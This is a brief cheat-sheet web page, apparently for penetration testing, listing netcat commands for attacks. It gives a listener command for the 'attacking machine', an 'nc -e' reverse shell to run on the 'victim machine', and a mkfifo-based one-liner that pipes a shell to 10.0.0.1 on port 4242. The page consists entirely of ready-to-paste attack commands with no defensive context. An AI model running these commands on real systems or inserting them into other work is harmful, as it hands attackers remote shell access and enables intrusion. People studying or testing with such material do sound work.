Netcat Cheat Sheet



Start Netcat Listener (On Attacking Machine)

nc -lvnp [port number]

Start Reverse Shell (On Victim Machine)

nc -e "/bin/bash -i" [Attack Machine IP] [Port]

Netcat Reverse Shell Version #2

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f

Back to Homepage